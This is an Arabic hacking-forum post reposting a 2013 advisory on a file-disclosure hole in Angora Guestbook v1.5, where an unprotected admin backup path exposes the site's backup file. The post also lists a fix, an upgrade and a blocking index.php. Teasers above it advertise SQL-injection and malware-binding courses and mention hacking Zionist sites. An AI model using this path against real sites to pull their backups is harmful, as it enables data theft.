1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ ثغره ] Angora Guestbook v1.5 File Disclosure (Backup) vulnerability

الموضوع في '[ ثــغـرات الأعــضــاء]' بواسطة Ubuntu, بتاريخ ‏14 ديسمبر 2013.

كاتب الموضوع : Ubuntu المشاهدات : 747 الردود : 0 ‏14 ديسمبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Ubuntu
    rankrank
    Developer

    عضو منذ:
    ‏6 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته


    ثغرة لتحميل الbackup

    كود PHP:
    site.com/path/admin/backup
    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ _ \ | \ | | /  __ \ \ / / ___ \  ___| ___ \
      | | | | | |  \| | | | \ `--.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |_| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \_/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93; Author: TUNISIAN CYBER
    ***91;+***93; Exploit Title:  Angora Guestbook v1.5 File Disclosure (Backup)/LFI vulnerabilities
    ***91;+***93; Date: 8-12-2013
    ***91;+***93; Vendor:aguestbook.sourceforge.net/
    ***91;+***93; Category: WebApp
    ***91;+***93; Google Dork: n/a
    ***91;+***93; Tested on: Win7 , ubuntu 13.04
     
     
    ########################################################################################


    I/File Disclosure (Backup)

    site.dom/***91;path***93;/guestbook/admin/backup <-- unrestricted access to the backup file

    from localtest:http://oi44.tinypic.com/10igt1g.jpg

    Solution: 1/Upgrade to v1.6.1
              2/Creat index.php:
    <?php
        
    die("Access Denied");
    ?>
    -------------------------

    ./3nD
    ########################################################################################
    Greets to: XMaXtn, N43il HacK3r, XtechSEt
     


    جاري تحميل الصفحة...
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...